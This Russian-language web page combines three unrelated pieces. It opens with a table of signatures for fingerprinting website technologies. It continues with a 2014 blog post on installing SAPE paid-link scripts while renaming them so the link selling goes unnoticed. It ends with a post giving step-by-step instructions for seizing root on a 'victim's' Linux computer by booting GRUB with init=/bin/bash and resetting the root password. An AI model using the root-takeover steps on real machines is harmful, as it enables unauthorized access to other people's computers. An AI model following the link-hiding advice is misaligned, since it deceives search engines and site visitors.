osCommerce онлайн-магазины Set-Cookie: osCsid=|utmcct=/applications/oscommerce - (<a[^>]*(\\?|&)osCsid
Powered by (<[^]+>)?osCommerce</a>
<[^]+class=\\\»[^>]*infoBoxHeading)
- -
osCSS онлайн-магазины - - <body onload=\\\»window\\.defaultStatus=’oscss templates’;\\\» - -
Outbrain виджеты - - widgets\\.outbrain\\.com/outbrain\\.js
var OB_langJS = ‘.+widgets\\.outbrain\\.com/lang_
^OutbrainPermaLink$
- -
OXID
eShop
онлайн-магазины - - <!—.*OXID eShop
^ox(TopMenu|ModalPopup|LoginBox|InputValidator)
- -
PANSITE cms - generator: PANSITE - - -
papaya
CMS
cms - - <link[^>]*/papaya-themes/ - -
Parse.ly системы
статистики
- - ^PARSELY$ - -
Percussion cms - generator: (Percussion | Rhythmyx) <[^>]+class=\\\»perc-region\\\» - -
Perl языки
программирования
- - - - -
PHP языки программирования Server: php
X-Powered-By: php
Set-Cookie: PHPSESSID
- - \.php$ -
phpAlbum фотогалереи - - <!—phpalbum [\.\d\s]+—> - PHP
phpBB доски сообщений Set-Cookie: ^phpbb copyright: phpBB Group (Powered by <a[^>]+phpbb|<a[^>]+phpbb[^>]+class=.copyright|\tphpBB style name|<[^>]+styles/(sub|pro)silver/theme|<img[^>]+i_icon_mini|<table
class=\\\»forumline)
^(style_cookie_settings|phpbb_)
- PHP
phpCMS cms - - ^phpcms - PHP
phpDocumentor утилиты
для
создание
документации
- - <!— Generated by phpDocumentor - PHP
PHP-Fusion cms - - Powered by <a href=\\\»[^>]+php-fusion - PHP
phpMyAdmin менеджеры
баз
данных
- - (
var pma_absolute_uri = ‘
PMA_sendHeaderLocation\(|<title>phpMyAdmin</title>)
- PHP
PHP-Nuke доски
сообщений
- generator
:
PHP-Nuke
<[^>]+Powered by PHP-Nuke - -
phpPgAdmin менеджеры
баз
данных
- - (<title>phpPgAdmin</title>|<span class=\\\»appname\\\»>phpPgAdmin) - PHP
phpSQLiteCMS cms - generator: ^phpSQLiteCMS - - PHP
phpwind cms - generator: ^phpwind Powered by <a href=\\\».+phpwind\\.net - PHP
Piwik системы
статистики
- - var piwikTracker = Piwik\\.getTracker\\(
^Piwik$
- -
Plentymarkets онлайн-магазины - generator: ^www\.plentyMarkets - - -
Plesk хостинг-панели X-Powered-By-Plesk: Plesk
X-Powered-By: PleskLin
- common\\.js\\?plesk - -
Pligg cms - generator: Pligg <span[^>]+id=\\\»xvotes-0 - -
Plone cms - generator: Plone - - Python
Plura разное - - <iframe src=\\\».+pluraserver\\.com - -
Po.st виджеты - - ^pwidget_config$ - -
Posterous cms - - <div class=\\\»posterous
^Posterous
- -
Powergap онлайн-магазины - - (s\\d\\d)\\.php\\?shopid=\\1 - -
Prestashop онлайн-магазины - generator: PrestaShop Powered by <a href=\\\»[^>]+PrestaShop - PHP
Prototype javascript-фреймворки - - (prototype|protoaculous)\\.js
^Prototype$
- -
Protovis javascript-графика - - protovis.*\\.js ^protovis$ -
punBB доски
сообщений
- - Powered by <a href=\\\»[^>]+punbb - PHP
Python языки программирования - - - - -
Quantcast системы
статистики
- - edge\\.quantserve\\.com/quant\\.js
^quantserve$
- -
Quick.Cart онлайн-магазины - - <a href=\\\»[^>]+opensolution\\.org/\\\»>Powered by - -
RackCache системы
кеширования
X-Rack-Cache: .+ - - - Ruby
Raphael javascript-графика - - raphael.*\\.js
^Raphael$
- -
RBS
Change
cms - generator: RBS Change <html[^>]+xmlns:change= - PHP
RCMS cms - generator: (RCMS | ReallyCMS) - - -
reCAPTCHA капчи - - <div[^>]+id=\\\»recaptcha_image
(api-secure\\.recaptcha\\.net|recaptcha_ajax\\.js)
^Recaptcha$
- -
Red
Hat
операционные
системы
Server: (Red Hat|rhel\\d+)
X-Powered-By:Red Hat
- - - -
Reddit доски
сообщений
- - (<script[^>]+>var reddit = {|<a[^>]+Powered by Reddit|powered by <a[^>]+>reddit<)
^reddit$
^(www\\.)?reddit\\.com Python
Redmine тикет-системы - description:Redmine Powered by <a href=\\\»[^>]+Redmine - Ruby on Rails
Reinvigorate системы статистики - - reinvigorate\\.track\\(\\\» - -
RequireJS javascript-фреймворки - - require.*\\.js
^requirejs$
- -
RoundCube онлайновые почтовые клиенты - - ^(rcmail|rcube_|roundcube)
<title>RoundCube
- PHP
Ruby языки программирования Server:(Mongrel|WEBrick|Ruby) - - - -
Ruby on Rails web-фреймворки Server:(mod_rails|mod_rack|Phusion\.Passenger)
X-Powered-By:(mod_rails|mod_rack|Phusion\.Passenger)
csrf-param:authenticity_token /assets/application-[a-z\\d]{32}/\\.js - Ruby
S.Builder cms - generator:S\.Builder - - -
s9y cms - generator:Serendipity
Powered-By:Serendipity
- - -
script.aculo.us javascript-фреймворки - - (scriptaculous|protoaculous)\\.js
^Scriptaculous$
- -
SDL Tridion cms - - mfinfo\\.application=’Tridion - -
Slaed cms - - <meta name=["']generator["'] [^>]+SLAED
Powered by.*href=»http:\/\/www\.slaed\.net».*SLAED CMS
- PHP
Sencha Touch javascript-фреймворки - - sencha-touch.*\\.js - -
Seoshop онлайн-магазины - - http://www\\.getseoshop\\.com - -
ShareThis виджеты - - w\\.sharethis\\.com/
^SHARETHIS$
- -
Shopalize виджеты - - ^Shopalize$ - -
Shopify онлайн-магазины - - <link[^>]+=cdn\\.shopify\\.com
^Shopify$
- -
Shopware онлайн-магазины - application-name: Shopware shopware\\.js - PHP
sIFR скрипты для подключения шрифтов - - sifr\\.js - -
SilverStripe cms - generator:SilverStripe Powered by <a href=\\\»[^>]+SilverStripe - -
Site Meter системы статистики - - sitemeter\\.com/js/counter\\.js\\?site= - -
SiteCatalyst системы статистики - - var s_code=s\\.t\\(\\);if\\(s_code\\)document\\.write\\(s_code\\)
^s_account$
- -
SiteEdit cms - generator:SiteEdit - - -
Smartstore онлайн-магазины - - smjslib\\.js - -
SMF доски сообщений - - <script [^>]+\\s+var smf_
^smf
- PHP
sNews cms - generator:sNews - - -
Snoobi системы статистики - - snoobi\\.com/snoop\\.php
^snoobi$
- Joomla
SOBI 2 разное - - (<!— start of Sigsiu Online Business Index|<div[^>]* class=\\\»sobi2) - Joomla
SobiPro разное - - ^SobiProUrl$
<(script|link)[^>].*com_sobipro.*>
- Joomla
SoundManager javascript-фреймворки - - ^(SoundManager|BaconPlayer)$ - -
SPDY разное X-Firefox-Spdy: .* - - - -
Sphinx утилиты для создание документации - - ^DOCUMENTATION_OPTIONS$ - Python
SPIP cms X-Spip-Cache: .* generator:SPIP - - -
SQL Buddy менеджеры баз данных - - (<title>SQL Buddy</title>|<[^>]+onclick=\\\»sideMainClick\\(\\\»home\\.php) - -
Squarespace cms - - Squarespace\\.Constants\\.CURRENT_MODULE_ID - -
Squiz Matrix cms - generator:Squiz Matrix Running (MySource|Squiz) Matrix», «X-Powered-By»:»Squiz Matrix - PHP
StatCounter системы статистики - - statcounter\\.com/counter/counter - -
Store Systems онлайн-магазины - - Shopsystem von <a href=.+store-systems\\.de\\\»|\\.mws_boxTop - -
SublimeVideo видеоплееры - - cdn\\.sublimevideo\\.net/js/[a-z\\d]+\\.js
^sublimevideo$
- -
SWFObject разное - - -swfobject.*\\.js
^SWFObject$
- -
swift.engine cms X-Powered-By:swift\.engine - - - -
Swiftlet web-фреймворки X-Swiftlet-Cache: .*
X-Powered-By:Swiftlet
X-Generator:Swiftlet
generator:Swiftlet Powered by <a href=\\\»[^>]+Swiftlet - PHP
Textpattern CMS cms - generator:Textpattern - - -
three.js javascript-графика - - three\\.js
^THREE$
- -
Tiki Wiki CMS Groupware cms - generator: ^Tiki (/|_)tiki - -
Timeplot javascript-графика - - timeplot.*\\.js
>^Timeplot$
- -
TinyMCE редакторы расширенной разметки - - ^tinyMCE$ - -
Tealeaf системы статистики - - ^TeaLeaf$ - -
TomatoCart онлайн-магазины - generator:TomatoCart ^AjaxShoppingCart$ - -
Trac тикет-системы - - <a id=\\\»tracpowered - Python
Tumblr блоги X-Tumblr-Usec: .* - <iframe src=\\\».+tumblr\\.com ^(www.)?.+\\.tumblr\\.com -
Twilight CMS cms X-Powered-CMS:Twilight CMS - - - -
Twitter Bootstrap web-фреймворки - - twitter\\.github\\.com/bootstrap
<link[^>]+bootstrap[^>]+css
^Twipsy$
- -
Typekit скрипты для подключения шрифтов - - use\\.typekit\\.com
^Typekit$
- -
TypePad блоги - generator:typepad - ^(www.)?.+\\.typepad\\.com -
TYPO3 cms Set-Cookie:fe_typo_user generator:TYPO3 (<(script[^>]* src|link[^>]* href)=[^>]*fileadmin|<!—TYPO3SEARCH) /typo3/ PHP
Ubercart онлайн-магазины - - uc_cart/uc_cart_block\\.js - Drupal
uCoz cms - - /rel=»StyleSheet» href=»http:\/\/s\d+\.ucoz\.net\/src\/layer\d+\.css»
type=»text\/javascript» src=»http:\/\/s\d+\.ucoz\.net\/src\/u\.js»
src=»http:\/\/s\d+\.ucoz\.net\/img\/cp\/\d+.gif»
<a href=»http:\/\/www\.ucoz\.ru\/» title=»Создать сайт бесплатно»>uCoz<\/a>
title=»uCoz Counter»
^https?:\/\/[^\/]+\.ucoz\.(ru|net|com|ua|org|biz)(\/|$) -
Ubuntu операционные системы Server:Ubuntu
X-Powered-By:Ubuntu
- - - -
Umbraco cms X-Umbraco-Version: .+ generator:umbraco powered by <a href=[^>]+umbraco - Microsoft ASP.NET
Underscore.js javascript-фреймворки - - underscore.*\\.js - -
UNIX операционные системы Server:Unix - - - -
UserRules тикет-системы - - var _usrp =
^_usrp$
- -
UserVoice тикет-системы - - ^UserVoice$ - -
Vanilla доски сообщений X-Powered-By:Vanilla - <body id=\\\»(DiscussionsPage|vanilla) - PHP
Varnish системы кеширования X-Varnish: .+
X-Varnish-Age: .+
X-Varnish-Cache: .+
X-Varnish-Action: .+
X-Varnish-Hostname: .+
Via:Varnish
- - - -
vBulletin доски сообщений - generator:vBulletin ^(vBulletin|vB_[^g]) - PHP
VideoJS видеоплееры - - <div.+class=\\\»video-js+\\\»>
^VideoJS$
zencdn\\.net/c/video\\.js
- -
viennaCMS cms - - powered by <a href=\\\»[^>]+viennacms - -
Vignette cms - - <[^>]+?=\\\»(vgn-ext|vgnext) - -
Vimeo видеоплееры - - <(param|embed)[^>]+vimeo\\.com/moogaloop|<iframe[^>]player\\.vimeo\\.com - -
VirtueMart онлайн-магазины - - <div id=\\\»vmMainPage - -
VisualPath системы статистики - - visualpath[^/]*\\.trackset\\.it/[^/]+/track/include\\.js - -
VIVVO cms Set-Cookie:VivvoSessionId - ^vivvo - -
Volusion онлайн-магазины - - /v/vspfiles(/.)*/css/.+\\.css - -
Vox блоги - - - ^(www.)?.+\\.vox\\.com -
VP-ASP онлайн-магазины - - vs350\\.js
<a[^>]+>Powered By VP-ASP Shopping Cart</a>
- Microsoft ASP.NET
W3Counter системы статистики - - w3counter\\.com/tracker\\.js - -
W3 Total Cache системы кеширования - - <!—[^>]+W3 Total Cache - WordPress
W3 Total Cache cms - - <meta name=(«|’)generator(«|’) [^>]+WebCodePortalSystem — http:\/\/wcps\.ru) - PHP
Web Optimizer системы статистики - - <title [^>]*lang=\\\»wo\\\»> - -
webEdition cms - generator:webEdition
DC.title:webEdition
- - -
WebGUI cms - generator:WebGUI - - -
WebPublisher cms - generator:WEB\|Publisher - - -
Websale онлайн-магазины - - - /websale7/ -
WebsiteBaker cms - generator:WebsiteBaker - - PHP
Webtrekk системы статистики - - var webtrekk = new Object - -
Webtrends системы статистики - - <img[^>]+id=\\\»DCSIMG\\\»[^>]+webtrends
<img[^>]+id=\\\»DCSIMG\\\»[^>]+webtrends
- -
Weebly cms - - <[^>]+class=\\\»weebly - -
WikkaWiki вики - generator:WikkaWiki Powered by <a href=\\\»[^>]+WikkaWiki - -
Windows Server операционные системы Server:Win32 - - - -
Wink javascript-фреймворки - - (_base/js/base|wink).*\\.js
^wink$
- -
Wolf CMS cms - - (<a href=\\\»[^>]+wolfcms\\.org.+Wolf CMS.+inside|Thank you for using <a[^>]+>Wolf CMS) - -
Woopra системы статистики - - static\\.woopra\\.com - -
WordPress блоги - generator:WordPress <link rel=\\\»stylesheet\\\» [^>]+wp-content
^wp_username$
- PHP
WordPress Super Cache системы кеширования - - <!—[^>]+WP-Super-Cache - WordPress
Xajax javascript-фреймворки - - xajax_core.*\\.js - -
Xanario онлайн-магазины - generator:xanario shopsoftware - - -
XenForo доски сообщений - - jQuery\\.extend\\(true, XenForo|Forum software by XenForo™|<!—XF:branding - -
XiTi системы статистики - - (<[^>]+src=\\\»[^>]+xiti\\.com/hit\\.xiti)
^Xt_
- -
XMB доски сообщений - - <!— Powered by XMB - -
XOOPS cms - generator:XOOPS ^xoops - PHP
xtCommerce онлайн-магазины - generator:xt:Commerce <div class=\\\»copyright\\\»>.+<a[^>]+>xt:Commerce - -
xui javascript-фреймворки - - [^a-zA-Z]xui.*\\.js
^xui$
- -
YaBB доски сообщений - - Powered by <a href=\\\»[^>]+yabbforum - -
Yahoo !Web Analytics системы статистики - - d\\.yimg\\.com/mi/ywa\\.js - -
Yandex.Metrika системы статистики - - mc\\.yandex\\.ru/metrika/watch\\.js - -
YouTube видеоплееры - - <<(param|embed|iframe)[^>]+youtube(-nocookie)?\\.com/(v|embed) - -
YUI Doc утилиты для создание документации - - <html[^>]* yuilibrary\\.com/rdf/[\\d.]+/yui\\.rdf - -
YUI javascript-фреймворки - - /yui/|yui\\.yahooapis\\.com
^YAHOO$
- -
Zen Cart онлайн-магазины - generator:Zen Cart - - -
Zend web-серверы X-Powered-By: Zend - - - -
Zepto javascript-фреймворки - - zepto.*\\.js
^Zepto$
- -
Zinnia блоги - generator:Zinnia - - Django
ZK web-фреймворки - - <!— ZK [\\.\\d\\s]+—> - Java

19 октября 2014

Здравствуйте, товарищи сайтоломатели!

Сегодня рассмотрим в общих чертах установку кода SAPE на различные движки нестандартными способами. Архитектуру скриптов Sape.

ДЛЯ ЧАЙНИКОВ!

Итак вы зарегили аккаунт Сапы (SAPE), далее для того чтобы добавить сайт в систему, неоходимо сначала установить код SAPE. Для этого нужно перейти на вкладку "Новая площадка", далее скачать архив с кодом Сапы.

Разбор скриптов Sape

Файл sape.php Состоит из пяти классов:

  • SAPE_globals 
  • SAPE_base
  • SAPE_client
  • SAPE_context
  • SAPE_articles

Перед тем как подключаются эти классы объявляется константа _SAPE_USER c вашим хеш кодом аккаунта define('_SAPE_USER', 'ВАШ_ХЕШ'); . 

Первые два класса (SAPE_globals и SAPE_base) являются основными и выполняют всю основную работу. Инициализация пользователя Sape, получение и запись базы сслылок и регистрацию настроек системы. 

Класс SAPE_client отвечает за  работу с обычными ссылками и наследует класс SAPE_base, имеет два вида вывода ссылок: 

  • Простые ссылки
  • Ссылки в виде блока

Для вывода ссылок в виде блока используется функция return_block_links()  или return_links($n, $options) с параметром  $options['as_block'] = true;   для вывода простых ссылок функция  return_links()  . При инициализации класса для выборки и вывода ссылок используется конструкция создания объекта класса и вызова функции return_links . Пример:

$sape = new SAPE_client();// Создание объекта класса
$sape->return_links($n);// запись выводимых ссылок в переменную

Переменная n отвечает за количество выводимых ссылок, можно сделать несколько выводов в разных местах. 

Класс SAPE_context отвечает за вывод контекстных ссылок в тексте и наследует класс SAPE_base, какие там настройки не знаю, не пользуюсь. Пример:

$sape_context = new SAPE_context();// Создание объекта класса
$text = '';// В данной переменной часть кода вашей страницы
$text = $sape_context->replace_in_text_segment($text);// обработка вашего текста, добавление в него ссылок
echo $text;// Вывод в браузер

Класс SAPE_articles выводит статьи на отдельно создаваемых страницах, наследует класс SAPE_base, данный класс я не рассматривал.

Внимание! Если вы не собираетесь размещать контекстные ссылки и статьи, просто удалите эти два класса из файла sape.php!

Продвинутая установка кода Сапы на сайт!

Исходя из того что нам надо просто подключить пару классов, создать объект и сделать выборку, мы немного упростим код! Я у себя удалил ненужные классы, чтобы меньше кода грузилось и оставил только вывод простых ссылок. Что нужно сделать:

  • Удалить комментарии
  • Переименовать Классы
  • Закодировать и переименовать файлы с базами ссылок
  • Убрать везде слово sape

Пробежался и очистил код от пустых строк и комментариев кода.

Далее Константу _SAPE_USER я заменил во всем коде на _SUSER,  так менее палевно, вы можете ее назвать как угодно, главное что бы в коде не было такой константы, иначе получится ошибка. Перед классами определил константу _SUSER - define('_SUSER', 'ВАШ_ХЕШ');.

 Дальше начинается работа с самими классами, чтобы скрыть что это код SAPE, я переименовал Первые два класса SAPE_globals и SAPE_base  на WBS_globals и WBS_base. 

В классе SAPE_base в функции _return_obligatory_page_content используется объект класса SAPE_globals, там тоже надо заменить его на WBS_globals! Вы можете называть классы как угодно, главное чтобы в вашем движке сайта таких не было. В классе SAPE_base в качестве конструктора используется одноименная функция класса SAPE_base, ее я заменил на стандартный конструктор __construct.

3 октября 2014
Многие хотят ломать пентагоны, мелкософты или просто хотят казаться крутым хацкером.Ведь ты тоже, дорогой читатель ? Да, есть много способов доказать свою крутоту, офигенноту профоту, но немногие из них приносят реальный результат. Но этот способ работает в 90 % процентов случаев (я не знаю насколько надо быть админу системы паранойиком, чтобы сделать защиту на это), но исключать, что такие люди есть мы не будем. Правильно ?

В чемЪ суть ?

  • в админском доступе к компьютеру жертвы
  • в показе свое крутоты
Что понадобится ?
  • руки
  • физический доступ к пк жертвы
  • примитивное понимание работы unix unix-like систем

Это наверное все.

Как мы будем проводить  наш взлом ?  Просто - сначала мы загружаем вместо системы иницализации оболочк в одиночном режиме и таким образом получаем root'a. И меняем от него же пароль, а потом нормально входим в систему зная пароль от админа :3

Начинаем 

  1. Включаем компьюетр и ждем экрана загрузчика (он как на картинке картинка)
  2. жмем e (работает в GRUB, если у вашей жертвы не GRUB, то предвариетльно узнайте как в его загрузчике вызвать параметры ядра)
  3. Убираем такие параметры из строчки со начинающейся со слова kernel или kernel : quiet и splash, чтобы видить чистый лог загрузки
  4. Если в строке есть слова типа ro, то меняем их на rw, если нет - допишем
  5. пишем в конце этой строки singe init=/bin/bash. Если у вашей жертвы оболочка bash, в других слуучаях тоже стоит узнать про оболочку
  6. Жмем F10 и загружаемся в ROOT-консоль
  7. монтируем командой mount основную файловую систему. 
  8. Меняем командой passwd пароль на рута. 
  9. PRFIT ! Загружаем компьютер и входим в систему от пользователя root с нашим паролем